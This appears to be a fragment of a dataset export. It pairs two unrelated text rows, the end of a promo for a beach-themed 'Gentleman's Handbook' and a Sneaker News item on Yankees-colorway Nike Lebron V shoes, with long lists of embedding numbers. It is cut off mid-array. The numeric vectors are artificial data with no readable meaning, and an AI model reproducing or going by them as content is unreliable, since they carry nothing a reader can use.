now, man, is a beach.\n\nFeet in the sand, beer in the hand, looking at gams.\n\nIt’s an honorable pursuit. And necessary. And you deserve it.\n\nThat’s why we’re proud to introduce The Gentleman’s Handbook, Vol. IV: To the Beach!\n\nInside, we’ve packed a veritable cooler’s worth of keep-it-frosty advice.\n\nTo wit:\n\nHow to Make the Perfect Beach Cocktail\n\nIn Defense of the Lake Beach\n\nThe Swim Trunks a Man Needs\n\nCoolers: a Definitive Guide\n\nPlus much more, including our advice on how to comport one’s self on the sand — e.g., please dude, turn your rap-metal and/or Elliott Smith down. The beach thanks you.\n\nNow kick back. Relax.\n\nAnd enjoy The Gentleman’s Handbook, Vol. IV: To the Beach!"},"embedding":{"kind":"list like","value":[-0.018208762630820274,0.024990804493427277,0.0796005129814148,-0.004289280157536268,0.03985529765486717,-0.04427733272314072,0.09561790525913239,-0.13254325091838837,-0.05375282093882561,-0.034913573414087296,-0.0023279248271137476,-0.018670860677957535,0.008605905808508396,-0.010961780324578285,0.10826914757490158,0.0003007378545589745,0.07450584322214127,-0.042710334062576294,0.0028006883803755045,0.029772507026791573,-0.04031261429190636,0.05351017042994499,-0.049857813864946365,0.006527499761432409,-0.12424219399690628,0.01682465709745884,0.003056704066693783,0.049021389335393906,-0.06098221242427826,0.03147973120212555,-0.022709090262651443,0.09903289377689362,-0.029240870848298073,-0.07617656886577606,-0.029357044026255608,-0.003931698389351368,0.00029664544854313135,-0.04686695709824562,-0.03875971585512161,0.06996066123247147,-0.056089848279953,-0.032072924077510834,0.0956893339753151,0.08437751978635788,0.030313100665807724,0.04349764809012413,0.0203584935516119,-0.07508178800344467,0.07233021408319473,0.009562426246702671,-0.02000994049012661,-0.007423695642501116,0.007625841535627842,-0.013635065406560898,-0.026029033586382866,0.07239893078804016,-0.010250137187540531,-0.0032938728109002113,-0.009830374270677567,0.03268712759017944,-0.0016256232047453523,0.03359214588999748,-0.05600212141871452,0.04688462242484093,0.11820909380912781,-0.05840180069208145,-0.012619062326848507,0.025540625676512718,-0.011799945496022701,0.07889298349618912,-0.044974856078624725,-0.0006612520664930344,0.0012196942698210478,0.02631501294672489,-0.07403743267059326,-0.004341496154665947,-0.037968121469020844,-0.028297992423176765,0.00770869804546237,-0.031276166439056396,-0.07404555380344391,-0.06750043481588364,0.03935404121875763,0.013642190024256706,-0.11405951529741287,-0.05228123813867569,0.08544113487005234,-0.04775065928697586,0.025005897507071495,0.08200760930776596,-0.11374346166849136,-0.08859245479106903,-0.04400524124503136,-0.04435041919350624,-0.025281865149736404,0.06634563952684402,-0.16339825093746185,0.010370421223342419,-0.12777212262153625,0.07429900020360947,0.06702897697687149,0.05449488386511803,-0.0247303768992424,-0.035475797951221466,0.032634373754262924,-0.05433593690395355,-0.009889122098684311,0.018089808523654938,-0.0060084122233092785,0.06166980788111687,-0.028457123786211014,0.016379542648792267,-0.01416081190109253,0.008450920693576336,0.059632811695337296,0.0005867491126991808,0.013177900575101376,-0.0017760354094207287,0.056541558355093,0.038107357919216156,0.015321651473641396,0.059268172830343246,0.05126072093844414,0.10568629950284958,-0.017462003976106644,-0.032478392124176025,-0.004568823147565126,-4.8565361759810646e-33,0.04907684028148651,0.04768439754843712,0.0403183251619339,0.10918474197387695,0.12876731157302856,0.0006118337041698396,-0.017569126561284065,-0.08463753014802933,0.0010534310713410378,0.054768458008766174,0.03857618197798729,0.051903918385505676,-0.09973513334989548,0.010487382300198078,0.027700379490852356,0.018270082771778107,-0.05044358968734741,-0.09636194258928299,-0.07520317286252975,-0.07947828620672226,-0.023083114996552467,-0.009847613982856274,-0.05740909278392792,-0.02461126819252968,-0.03899967670440674,0.025391627103090286,0.057673949748277664,0.01988987624645233,0.021810805425047874,0.03965532407164574,-0.05165818706154823,0.0016072836006060243,0.023359358310699463,0.016383133828639984,0.05603202432394028,0.03631092980504036,-0.018010923638939857,0.009401022456586361,0.018976300954818726,-0.05527115613222122,-0.008457797579467297,0.01123884692788124,-0.005705102812498808,0.04312954843044281,-0.07313797622919083,-0.0016725026071071625,0.020314009860157967,0.03164558485150337,0.001603348064236343,-0.03566568344831467,-0.03522292897105217,-0.038991376757621765,0.05792174115777016,-0.008203081786632538,-0.0819714367389679,-0.0459277480840683,-0.017760995775461197,-0.009550957940518856,-0.07021602243185043,-0.06768184155225754,0.052698295563459396,0.08152187615633011,0.012132319621741772,0.017946088686585426,-0.08331873267889023,0.04860685393214226,0.01796276867389679,0.011632910929620266,-0.041440803557634354,-0.10327255725860596,-0.06535454094409943,0.03466083109378815,0.04662107303738594,0.0028249204624444246,-0.016830984503030777,0.009883754886686802,0.04312160983681679,-0.06113066524267197,0.021122319623827934,-0.03102252446115017,-0.045092079788446426,0.047701213508844376,-0.0026694738771766424,0.05943683534860611,-0.05087237432599068,-0.07722672820091248,0.07804964482784271,-0.03829250484704971,0.11551269888877869,0.02892150543630123,-0.07996586710214615,-0.025627953931689262,0.07427365332841873,0.011967232450842857,-0.07110504806041718,6.074624656440894e-34,0.06284132599830627,-0.04630625620484352,0.04312586039304733,0.03606237843632698,0.08072908967733383,-0.038773540407419205,0.02423139661550522,-0.02462124638259411,0.04656829312443733,-0.07378125190734863,-0.13723266124725342,0.033148474991321564,-0.005185512360185385,-0.053596362471580505,0.08265615254640579,-0.07269474118947983,-0.057391926646232605,0.03678815811872482,-0.019205769523978233,0.04084905609488487,0.0016473685391247272,0.015363293699920177,0.08195104449987411,-0.009496955201029778,-0.07987550646066666,-0.0029448997229337692,0.07920677959918976,-0.027193425223231316,-0.03413645923137665,0.005864637903869152,0.0039303721860051155,-0.021680230274796486,-0.01824105903506279,-0.07458542287349701,-0.04910503700375557,0.010237988084554672,0.002296463120728731,-0.010466499254107475,-0.04891147091984749,0.04493587091565132,-0.013954284600913525,-0.1108696460723877,-0.0030641283374279737,-0.018028464168310165,0.010027559474110603,0.03399511054158211,0.003608090803027153,-0.0037793228402733803,-0.09399604052305222,-0.018647905439138412,0.003979325294494629,-0.036182060837745667,-0.07638495415449142,-0.008890468627214432,-0.011393275111913681,-0.06324344873428345,0.001971406163647771,0.01103485282510519,-0.055717483162879944,0.08303532004356384,-0.013239411637187004,0.05098022148013115,-0.09938842058181763,0.04361221566796303,-0.004609689582139254,0.0322740338742733,-0.04676401615142822,-0.020557265728712082,-0.07426206022500992,0.026903200894594193,-0.039392005652189255,-0.06387031823396683,-0.0411115437746048,-0.018300902098417282,0.0560380294919014,-0.052966345101594925,-0.0032222759909927845,-0.04659368842840195,-0.05055632442235947,-0.0481865219771862,-0.057899560779333115,0.01228549424558878,-0.09365377575159073,0.10563788563013077,0.05725574120879173,0.035406824201345444,0.016139866784214973,0.05099814012646675,-0.03003569133579731,-0.007016470190137625,0.008581461384892464,-0.04603762552142143,-0.09142895042896271,0.04197532311081886,-0.08017747849225998,-5.740162478673483e-8,-0.026882290840148926,0.057880938053131104,-0.005430695600807667,0.0404629223048687,0.01400861144065857,0.03495116904377937,0.031186485663056374,0.005109040066599846,0.06789899617433548,0.009992451407015324,-0.0132649140432477,0.0021107569336891174,0.04162173345685005,0.08693268150091171,0.006716066971421242,0.029541486874222755,0.04248317703604698,-0.0046168966218829155,-0.058943286538124084,-0.03989790007472038,0.026989348232746124,-0.04931106045842171,0.04338746890425682,0.005342819727957249,0.004013786558061838,0.08139060437679291,0.036420583724975586,0.04533321410417557,-0.0056134420447051525,0.0599636435508728,-0.022062236443161964,0.03661223128437996,-0.07028024643659592,-0.004593677818775177,-0.021890398114919662,-0.021820615977048874,0.07862856239080429,0.04063378646969795,0.04679039120674133,-0.00028917338931933045,-0.129089817404747,-0.02016318589448929,0.015079214237630367,0.04149332642555237,0.008852212689816952,0.053850311785936356,0.0559062696993351,0.06014604493975639,-0.055150795727968216,0.0871233344078064,0.010743335820734501,0.006284994073212147,0.0683685764670372,0.04218456521630287,0.05212758481502533,0.00030454673105850816,-0.026542900130152702,0.005041216034442186,-0.0436856783926487,-0.036411482840776443,0.06918419897556305,0.0033082563895732164,-0.1109277680516243,-0.031506069004535675],"string":"[\n -0.018208762630820274,\n 0.024990804493427277,\n 0.0796005129814148,\n -0.004289280157536268,\n 0.03985529765486717,\n -0.04427733272314072,\n 0.09561790525913239,\n -0.13254325091838837,\n -0.05375282093882561,\n -0.034913573414087296,\n -0.0023279248271137476,\n -0.018670860677957535,\n 0.008605905808508396,\n -0.010961780324578285,\n 0.10826914757490158,\n 0.0003007378545589745,\n 0.07450584322214127,\n -0.042710334062576294,\n 0.0028006883803755045,\n 0.029772507026791573,\n -0.04031261429190636,\n 0.05351017042994499,\n -0.049857813864946365,\n 0.006527499761432409,\n -0.12424219399690628,\n 0.01682465709745884,\n 0.003056704066693783,\n 0.049021389335393906,\n -0.06098221242427826,\n 0.03147973120212555,\n -0.022709090262651443,\n 0.09903289377689362,\n -0.029240870848298073,\n -0.07617656886577606,\n -0.029357044026255608,\n -0.003931698389351368,\n 0.00029664544854313135,\n -0.04686695709824562,\n -0.03875971585512161,\n 0.06996066123247147,\n -0.056089848279953,\n -0.032072924077510834,\n 0.0956893339753151,\n 0.08437751978635788,\n 0.030313100665807724,\n 0.04349764809012413,\n 0.0203584935516119,\n -0.07508178800344467,\n 0.07233021408319473,\n 0.009562426246702671,\n -0.02000994049012661,\n -0.007423695642501116,\n 0.007625841535627842,\n -0.013635065406560898,\n -0.026029033586382866,\n 0.07239893078804016,\n -0.010250137187540531,\n -0.0032938728109002113,\n -0.009830374270677567,\n 0.03268712759017944,\n -0.0016256232047453523,\n 0.03359214588999748,\n -0.05600212141871452,\n 0.04688462242484093,\n 0.11820909380912781,\n -0.05840180069208145,\n -0.012619062326848507,\n 0.025540625676512718,\n -0.011799945496022701,\n 0.07889298349618912,\n -0.044974856078624725,\n -0.0006612520664930344,\n 0.0012196942698210478,\n 0.02631501294672489,\n -0.07403743267059326,\n -0.004341496154665947,\n -0.037968121469020844,\n -0.028297992423176765,\n 0.00770869804546237,\n -0.031276166439056396,\n -0.07404555380344391,\n -0.06750043481588364,\n 0.03935404121875763,\n 0.013642190024256706,\n -0.11405951529741287,\n -0.05228123813867569,\n 0.08544113487005234,\n -0.04775065928697586,\n 0.025005897507071495,\n 0.08200760930776596,\n -0.11374346166849136,\n -0.08859245479106903,\n -0.04400524124503136,\n -0.04435041919350624,\n -0.025281865149736404,\n 0.06634563952684402,\n -0.16339825093746185,\n 0.010370421223342419,\n -0.12777212262153625,\n 0.07429900020360947,\n 0.06702897697687149,\n 0.05449488386511803,\n -0.0247303768992424,\n -0.035475797951221466,\n 0.032634373754262924,\n -0.05433593690395355,\n -0.009889122098684311,\n 0.018089808523654938,\n -0.0060084122233092785,\n 0.06166980788111687,\n -0.028457123786211014,\n 0.016379542648792267,\n -0.01416081190109253,\n 0.008450920693576336,\n 0.059632811695337296,\n 0.0005867491126991808,\n 0.013177900575101376,\n -0.0017760354094207287,\n 0.056541558355093,\n 0.038107357919216156,\n 0.015321651473641396,\n 0.059268172830343246,\n 0.05126072093844414,\n 0.10568629950284958,\n -0.017462003976106644,\n -0.032478392124176025,\n -0.004568823147565126,\n -4.8565361759810646e-33,\n 0.04907684028148651,\n 0.04768439754843712,\n 0.0403183251619339,\n 0.10918474197387695,\n 0.12876731157302856,\n 0.0006118337041698396,\n -0.017569126561284065,\n -0.08463753014802933,\n 0.0010534310713410378,\n 0.054768458008766174,\n 0.03857618197798729,\n 0.051903918385505676,\n -0.09973513334989548,\n 0.010487382300198078,\n 0.027700379490852356,\n 0.018270082771778107,\n -0.05044358968734741,\n -0.09636194258928299,\n -0.07520317286252975,\n -0.07947828620672226,\n -0.023083114996552467,\n -0.009847613982856274,\n -0.05740909278392792,\n -0.02461126819252968,\n -0.03899967670440674,\n 0.025391627103090286,\n 0.057673949748277664,\n 0.01988987624645233,\n 0.021810805425047874,\n 0.03965532407164574,\n -0.05165818706154823,\n 0.0016072836006060243,\n 0.023359358310699463,\n 0.016383133828639984,\n 0.05603202432394028,\n 0.03631092980504036,\n -0.018010923638939857,\n 0.009401022456586361,\n 0.018976300954818726,\n -0.05527115613222122,\n -0.008457797579467297,\n 0.01123884692788124,\n -0.005705102812498808,\n 0.04312954843044281,\n -0.07313797622919083,\n -0.0016725026071071625,\n 0.020314009860157967,\n 0.03164558485150337,\n 0.001603348064236343,\n -0.03566568344831467,\n -0.03522292897105217,\n -0.038991376757621765,\n 0.05792174115777016,\n -0.008203081786632538,\n -0.0819714367389679,\n -0.0459277480840683,\n -0.017760995775461197,\n -0.009550957940518856,\n -0.07021602243185043,\n -0.06768184155225754,\n 0.052698295563459396,\n 0.08152187615633011,\n 0.012132319621741772,\n 0.017946088686585426,\n -0.08331873267889023,\n 0.04860685393214226,\n 0.01796276867389679,\n 0.011632910929620266,\n -0.041440803557634354,\n -0.10327255725860596,\n -0.06535454094409943,\n 0.03466083109378815,\n 0.04662107303738594,\n 0.0028249204624444246,\n -0.016830984503030777,\n 0.009883754886686802,\n 0.04312160983681679,\n -0.06113066524267197,\n 0.021122319623827934,\n -0.03102252446115017,\n -0.045092079788446426,\n 0.047701213508844376,\n -0.0026694738771766424,\n 0.05943683534860611,\n -0.05087237432599068,\n -0.07722672820091248,\n 0.07804964482784271,\n -0.03829250484704971,\n 0.11551269888877869,\n 0.02892150543630123,\n -0.07996586710214615,\n -0.025627953931689262,\n 0.07427365332841873,\n 0.011967232450842857,\n -0.07110504806041718,\n 6.074624656440894e-34,\n 0.06284132599830627,\n -0.04630625620484352,\n 0.04312586039304733,\n 0.03606237843632698,\n 0.08072908967733383,\n -0.038773540407419205,\n 0.02423139661550522,\n -0.02462124638259411,\n 0.04656829312443733,\n -0.07378125190734863,\n -0.13723266124725342,\n 0.033148474991321564,\n -0.005185512360185385,\n -0.053596362471580505,\n 0.08265615254640579,\n -0.07269474118947983,\n -0.057391926646232605,\n 0.03678815811872482,\n -0.019205769523978233,\n 0.04084905609488487,\n 0.0016473685391247272,\n 0.015363293699920177,\n 0.08195104449987411,\n -0.009496955201029778,\n -0.07987550646066666,\n -0.0029448997229337692,\n 0.07920677959918976,\n -0.027193425223231316,\n -0.03413645923137665,\n 0.005864637903869152,\n 0.0039303721860051155,\n -0.021680230274796486,\n -0.01824105903506279,\n -0.07458542287349701,\n -0.04910503700375557,\n 0.010237988084554672,\n 0.002296463120728731,\n -0.010466499254107475,\n -0.04891147091984749,\n 0.04493587091565132,\n -0.013954284600913525,\n -0.1108696460723877,\n -0.0030641283374279737,\n -0.018028464168310165,\n 0.010027559474110603,\n 0.03399511054158211,\n 0.003608090803027153,\n -0.0037793228402733803,\n -0.09399604052305222,\n -0.018647905439138412,\n 0.003979325294494629,\n -0.036182060837745667,\n -0.07638495415449142,\n -0.008890468627214432,\n -0.011393275111913681,\n -0.06324344873428345,\n 0.001971406163647771,\n 0.01103485282510519,\n -0.055717483162879944,\n 0.08303532004356384,\n -0.013239411637187004,\n 0.05098022148013115,\n -0.09938842058181763,\n 0.04361221566796303,\n -0.004609689582139254,\n 0.0322740338742733,\n -0.04676401615142822,\n -0.020557265728712082,\n -0.07426206022500992,\n 0.026903200894594193,\n -0.039392005652189255,\n -0.06387031823396683,\n -0.0411115437746048,\n -0.018300902098417282,\n 0.0560380294919014,\n -0.052966345101594925,\n -0.0032222759909927845,\n -0.04659368842840195,\n -0.05055632442235947,\n -0.0481865219771862,\n -0.057899560779333115,\n 0.01228549424558878,\n -0.09365377575159073,\n 0.10563788563013077,\n 0.05725574120879173,\n 0.035406824201345444,\n 0.016139866784214973,\n 0.05099814012646675,\n -0.03003569133579731,\n -0.007016470190137625,\n 0.008581461384892464,\n -0.04603762552142143,\n -0.09142895042896271,\n 0.04197532311081886,\n -0.08017747849225998,\n -5.740162478673483e-8,\n -0.026882290840148926,\n 0.057880938053131104,\n -0.005430695600807667,\n 0.0404629223048687,\n 0.01400861144065857,\n 0.03495116904377937,\n 0.031186485663056374,\n 0.005109040066599846,\n 0.06789899617433548,\n 0.009992451407015324,\n -0.0132649140432477,\n 0.0021107569336891174,\n 0.04162173345685005,\n 0.08693268150091171,\n 0.006716066971421242,\n 0.029541486874222755,\n 0.04248317703604698,\n -0.0046168966218829155,\n -0.058943286538124084,\n -0.03989790007472038,\n 0.026989348232746124,\n -0.04931106045842171,\n 0.04338746890425682,\n 0.005342819727957249,\n 0.004013786558061838,\n 0.08139060437679291,\n 0.036420583724975586,\n 0.04533321410417557,\n -0.0056134420447051525,\n 0.0599636435508728,\n -0.022062236443161964,\n 0.03661223128437996,\n -0.07028024643659592,\n -0.004593677818775177,\n -0.021890398114919662,\n -0.021820615977048874,\n 0.07862856239080429,\n 0.04063378646969795,\n 0.04679039120674133,\n -0.00028917338931933045,\n -0.129089817404747,\n -0.02016318589448929,\n 0.015079214237630367,\n 0.04149332642555237,\n 0.008852212689816952,\n 0.053850311785936356,\n 0.0559062696993351,\n 0.06014604493975639,\n -0.055150795727968216,\n 0.0871233344078064,\n 0.010743335820734501,\n 0.006284994073212147,\n 0.0683685764670372,\n 0.04218456521630287,\n 0.05212758481502533,\n 0.00030454673105850816,\n -0.026542900130152702,\n 0.005041216034442186,\n -0.0436856783926487,\n -0.036411482840776443,\n 0.06918419897556305,\n 0.0033082563895732164,\n -0.1109277680516243,\n -0.031506069004535675\n]"}}},{"rowIdx":1286,"cells":{"text":{"kind":"string","value":"Nike Zoom Lebron V – New York Yankees – White/Navy\n\n4.50 / 5 1 VOTES This post contains references to products from one or more of our advertisers. We may receive compensation when you click on links to those products. The opinions and information provided on this site are original editorial content of Sneaker News.\n\nThanks to the good folks over at Kenlu, we now have great pictures of the Nike Zoom Lebron V shoes in the special New York Yankees makeup. We showed you these a few weeks back but these detailed pictures that have just surfaced do a lot more justice to the shoes than the pictures from before. Be prepared to see these at the House of Hoops in Harlem and on Lebron’s feet when he steps into the Garden on March 5, 2008 when the Cavs take on the Knicks. via Kenlu\n\nMore photos below…"},"embedding":{"kind":"list like","value":[-0.048859357833862305,0.07311535626649857,0.06924787908792496,-0.0657225102186203,0.06312169879674911,-0.022751370444893837,-0.0002163163444492966,0.06377572566270828,0.04476243630051613,0.05520661547780037,0.027326013892889023,0.11165467649698257,-0.004655787255614996,0.051012612879276276,0.021901872009038925,0.0019554358441382647,0.0072212484665215015,0.07544205337762833,-0.08387620747089386,0.00818435475230217,0.0735909640789032,-0.06716864556074142,-0.013904714956879616,0.0566621758043766,0.005510374903678894,0.021817242726683617,0.0627015233039856,0.05818497762084007,-0.004749168176203966,-0.0296841561794281,-0.10763906687498093,-0.03105289302766323,-0.0068340604193508625,0.06675592064857483,-0.0331716425716877,-0.07979613542556763,0.027469849213957787,0.08772221207618713,0.028908880427479744,0.03709718585014343,0.010398547165095806,-0.05486594885587692,-0.051391225308179855,0.05812564864754677,0.0026515948120504618,-0.014020919799804688,0.012069431133568287,0.007452088408172131,-0.014977111481130123,0.0940883457660675,-0.053121186792850494,-0.023858657106757164,0.011544041335582733,-0.06096787378191948,0.08744049072265625,0.02759268879890442,-0.033422406762838364,0.014298060908913612,0.1103297770023346,-0.0246684979647398,0.10954219102859497,-0.009418949484825134,-0.08123648911714554,-0.010024802759289742,-0.04262112081050873,-0.09369294345378876,0.05222219228744507,-0.04391026496887207,-0.06295015662908554,-0.04497841000556946,0.07284124940633774,0.07167229056358337,0.04224563017487526,-0.00592667143791914,-0.04410114884376526,0.05257594957947731,-0.05400058627128601,-0.00024135290004778653,-0.016282377764582634,0.05785702168941498,0.1023482009768486,-0.05343529209494591,-0.033382758498191833,0.057750020176172256,-0.06711860746145248,0.044441934674978256,-0.09222347289323807,-0.030659355223178864,0.0291049275547266,-0.051066115498542786,-0.10844346135854721,-0.0489383339881897,-0.046116407960653305,-0.04969930648803711,-0.03933660313487053,0.007813614793121815,-0.05697242170572281,-0.07094885408878326,0.03901577368378639,0.04759597405791283,0.02225816808640957,0.003898617345839739,0.01953715831041336,0.01474601961672306,0.06716609001159668,0.013183957897126675,0.004386646207422018,0.04745910316705704,0.030354946851730347,0.1001846119761467,0.005690878722816706,0.02985288016498089,-0.06396219879388809,0.043617263436317444,-0.09107820689678192,-0.02718193084001541,-0.017288537696003914,0.09964605420827866,0.04926745593547821,-0.04398111253976822,-0.02821861021220684,0.07847984880208969,0.01640479266643524,-0.0215945802628994,-0.05336325615644455,-0.05578688159584999,-0.029813693836331367,5.017595065091042e-33,-0.0007671746425330639,-0.01953623816370964,0.016325879842042923,-0.017718154937028885,0.04029377922415733,0.018935516476631165,0.035233721137046814,-0.016869617626070976,-0.09317316114902496,-0.00950343906879425,-0.06955032795667648,0.04332438483834267,-0.01142294891178608,-0.010071265511214733,0.026561565697193146,-0.02861114591360092,0.013849889859557152,-0.07887578755617142,-0.0913350060582161,0.010606065392494202,0.0512567013502121,-0.025718817487359047,0.08169668912887573,0.10025487095117569,-0.032534100115299225,-0.07676556706428528,-0.01838194951415062,-0.005289742257446051,-0.02697962522506714,0.016751155257225037,0.0005292437272146344,0.02152741327881813,-0.00007474949234165251,-0.006219710223376751,-0.03928976505994797,-0.025482764467597008,0.031172461807727814,-0.025729870423674583,0.0051781004294753075,-0.03893148526549339,0.021005960181355476,-0.001621820847503841,-0.06102875620126724,-0.025189096108078957,-0.045065779238939285,0.0806812047958374,-0.025921575725078583,0.08472210168838501,-0.034991879016160965,-0.051617346704006195,0.0406426377594471,0.005137926433235407,-0.0005315187154337764,-0.10493531823158264,0.009108493104577065,-0.08512328565120697,0.04507787525653839,-0.03377724066376686,-0.01373705267906189,0.05166667699813843,-0.003120730398222804,0.03516639769077301,-0.024795586243271828,0.054801274091005325,-0.049060262739658356,-0.04480913281440735,-0.0030796886421740055,0.03486935794353485,0.01221027784049511,0.016398154199123383,0.024438196793198586,0.033649686723947525,-0.011812213808298111,0.015518932603299618,0.006626511923968792,-0.08223450183868408,-0.05005241930484772,0.0748443454504013,0.025199836120009422,-0.005315226037055254,0.029847566038370132,-0.011331849731504917,0.04034288972616196,0.01715981774032116,-0.05375414341688156,-0.03590613976120949,-0.037908654659986496,0.005930843763053417,-0.01388956792652607,0.004123818129301071,-0.10262307524681091,0.01628405973315239,-0.036235321313142776,-0.01778610795736313,-0.043259453028440475,-7.46718019212076e-33,-0.00544802937656641,0.042049113661050797,0.08542150259017944,0.07904887199401855,0.006372642703354359,0.061535708606243134,0.04617927223443985,0.06708767265081406,0.025119595229625702,-0.03591705858707428,0.00574831385165453,0.018342580646276474,-0.04164810851216316,0.04167773947119713,0.027481399476528168,0.0005334684392437339,-0.0127094192430377,-0.006745372898876667,0.01118866354227066,0.014139266684651375,0.09859984368085861,-0.008028609678149223,0.01889883726835251,0.02926632948219776,-0.05053522437810898,-0.06946717947721481,0.07891207933425903,0.06914965808391571,-0.16178978979587555,0.09033603221178055,0.06028355285525322,0.0018959876615554094,0.05742161348462105,-0.02446732297539711,-0.00015970882668625563,0.0008994676754809916,-0.06708913296461105,-0.0155935762450099,0.07848633825778961,-0.039054542779922485,0.019491072744131088,-0.08238793164491653,0.014988434500992298,-0.03016958199441433,0.02406909130513668,-0.05374991521239281,0.024828677996993065,-0.011835034936666489,0.015711862593889236,-0.05580856278538704,-0.042925771325826645,0.031636595726013184,-0.09982528537511826,0.09202593564987183,-0.07149346172809601,-0.037205472588539124,-0.10382717102766037,0.05464659258723259,0.03277409076690674,0.0032864909153431654,-0.02018679492175579,-0.027556495741009712,-0.11092612147331238,-0.03822210058569908,-0.013445299118757248,0.049742989242076874,0.03704205900430679,-0.03973779454827309,-0.022511955350637436,-0.04439806193113327,0.025240981951355934,-0.06876344233751297,0.04619143530726433,0.01706150732934475,-0.039696574211120605,-0.03471002355217934,-0.009147081524133682,0.07427653670310974,0.001432653865776956,0.06788170337677002,0.03519049286842346,-0.027146311476826668,-0.07605598121881485,0.0382767915725708,0.06609813123941422,0.11433148384094238,0.042852357029914856,0.02736973576247692,-0.0536850206553936,0.036366675049066544,0.06630988419055939,-0.007335127796977758,0.016010494902729988,0.009654974564909935,0.0725824311375618,-5.301710004346205e-8,0.05208538472652435,0.12750375270843506,0.03170407935976982,0.04743869602680206,-0.011520802974700928,-0.001135513768531382,0.026378275826573372,0.004814741667360067,0.05229104310274124,0.04121952876448631,-0.004205872304737568,-0.0220524650067091,-0.023500561714172363,0.0675637274980545,0.017968837171792984,0.031500108540058136,-0.07369408011436462,0.06827808171510696,-0.0056877718307077885,0.03701673448085785,-0.05554262921214104,-0.035282403230667114,0.06148736551403999,0.046722181141376495,-0.020086620002985,-0.10308033972978592,-0.14934027194976807,-0.0918082520365715,-0.017271097749471664,-0.012826806865632534,0.011630700901150703,0.02062240242958069,0.0027802607510238886,-0.10038763284683228,-0.058141522109508514,-0.03284963592886925,-0.04860454052686691,-0.03354370594024658,0.10212158411741257,-0.05410533398389816,-0.051954396069049835,-0.09853421151638031,-0.0050845458172261715,0.020411048084497452,-0.03427921235561371,-0.06265948712825775,0.07098063081502914,-0.026169447228312492,-0.1802583783864975,-0.0025257118977606297,-0.011119023896753788,0.019798606634140015,0.007122362032532692,-0.0054527767933905125,0.011063016019761562,-0.07835516333580017,-0.011527366936206818,0.014893213286995888,-0.018609028309583664,-0.0015701770316809416,0.02568460814654827,-0.03597070276737213,-0.07359638065099716,0.002983467886224389],"string":"[\n -0.048859357833862305,\n 0.07311535626649857,\n 0.06924787908792496,\n -0.0657225102186203,\n 0.06312169879674911,\n -0.022751370444893837,\n -0.0002163163444492966,\n 0.06377572566270828,\n 0.04476243630051613,\n 0.05520661547780037,\n 0.027326013892889023,\n 0.11165467649698257,\n -0.004655787255614996,\n 0.051012612879276276,\n 0.021901872009038925,\n 0.0019554358441382647,\n 0.0072212484665215015,\n 0.07544205337762833,\n -0.08387620747089386,\n 0.00818435475230217,\n 0.0735909640789032,\n -0.06716864556074142,\n -0.013904714956879616,\n 0.0566621758043766,\n 0.005510374903678894,\n 0.021817242726683617,\n 0.0627015233039856,\n 0.05818497762084007,\n -0.004749168176203966,\n -0.0296841561794281,\n -0.10763906687498093,\n -0.03105289302766323,\n -0.0068340604193508625,\n 0.06675592064857483,\n -0.0331716425716877,\n -0.07979613542556763,\n 0.027469849213957787,\n 0.08772221207618713,\n 0.028908880427479744,\n 0.03709718585014343,\n 0.010398547165095806,\n -0.05486594885587692,\n -0.051391225308179855,\n 0.05812564864754677,\n 0.0026515948120504618,\n -0.014020919799804688,\n 0.012069431133568287,\n 0.007452088408172131,\n -0.014977111481130123,\n 0.0940883457660675,\n -0.053121186792850494,\n -0.023858657106757164,\n 0.011544041335582733,\n -0.06096787378191948,\n 0.08744049072265625,\n 0.02759268879890442,\n -0.033422406762838364,\n 0.014298060908913612,\n 0.1103297770023346,\n -0.0246684979647398,\n 0.10954219102859497,\n -0.009418949484825134,\n -0.08123648911714554,\n -0.010024802759289742,\n -0.04262112081050873,\n -0.09369294345378876,\n 0.05222219228744507,\n -0.04391026496887207,\n -0.06295015662908554,\n -0.04497841000556946,\n 0.07284124940633774,\n 0.07167229056358337,\n 0.04224563017487526,\n -0.00592667143791914,\n -0.04410114884376526,\n 0.05257594957947731,\n -0.05400058627128601,\n -0.00024135290004778653,\n -0.016282377764582634,\n 0.05785702168941498,\n 0.1023482009768486,\n -0.05343529209494591,\n -0.033382758498191833,\n 0.057750020176172256,\n -0.06711860746145248,\n 0.044441934674978256,\n -0.09222347289323807,\n -0.030659355223178864,\n 0.0291049275547266,\n -0.051066115498542786,\n -0.10844346135854721,\n -0.0489383339881897,\n -0.046116407960653305,\n -0.04969930648803711,\n -0.03933660313487053,\n 0.007813614793121815,\n -0.05697242170572281,\n -0.07094885408878326,\n 0.03901577368378639,\n 0.04759597405791283,\n 0.02225816808640957,\n 0.003898617345839739,\n 0.01953715831041336,\n 0.01474601961672306,\n 0.06716609001159668,\n 0.013183957897126675,\n 0.004386646207422018,\n 0.04745910316705704,\n 0.030354946851730347,\n 0.1001846119761467,\n 0.005690878722816706,\n 0.02985288016498089,\n -0.06396219879388809,\n 0.043617263436317444,\n -0.09107820689678192,\n -0.02718193084001541,\n -0.017288537696003914,\n 0.09964605420827866,\n 0.04926745593547821,\n -0.04398111253976822,\n -0.02821861021220684,\n 0.07847984880208969,\n 0.01640479266643524,\n -0.0215945802628994,\n -0.05336325615644455,\n -0.05578688159584999,\n -0.029813693836331367,\n 5.017595065091042e-33,\n -0.0007671746425330639,\n -0.01953623816370964,\n 0.016325879842042923,\n -0.017718154937028885,\n 0.04029377922415733,\n 0.018935516476631165,\n 0.035233721137046814,\n -0.016869617626070976,\n -0.09317316114902496,\n -0.00950343906879425,\n -0.06955032795667648,\n 0.04332438483834267,\n -0.01142294891178608,\n -0.010071265511214733,\n 0.026561565697193146,\n -0.02861114591360092,\n 0.013849889859557152,\n -0.07887578755617142,\n -0.0913350060582161,\n 0.010606065392494202,\n 0.0512567013502121,\n -0.025718817487359047,\n 0.08169668912887573,\n 0.10025487095117569,\n -0.032534100115299225,\n -0.07676556706428528,\n -0.01838194951415062,\n -0.005289742257446051,\n -0.02697962522506714,\n 0.016751155257225037,\n 0.0005292437272146344,\n 0.02152741327881813,\n -0.00007474949234165251,\n -0.006219710223376751,\n -0.03928976505994797,\n -0.025482764467597008,\n 0.031172461807727814,\n -0.025729870423674583,\n 0.0051781004294753075,\n -0.03893148526549339,\n 0.021005960181355476,\n -0.001621820847503841,\n -0.06102875620126724,\n -0.025189096108078957,\n -0.045065779238939285,\n 0.0806812047958374,\n -0.025921575725078583,\n 0.08472210168838501,\n -0.034991879016160965,\n -0.051617346704006195,\n 0.0406426377594471,\n 0.005137926433235407,\n -0.0005315187154337764,\n -0.10493531823158264,\n 0.009108493104577065,\n -0.08512328565120697,\n 0.04507787525653839,\n -0.03377724066376686,\n -0.01373705267906189,\n 0.05166667699813843,\n -0.003120730398222804,\n 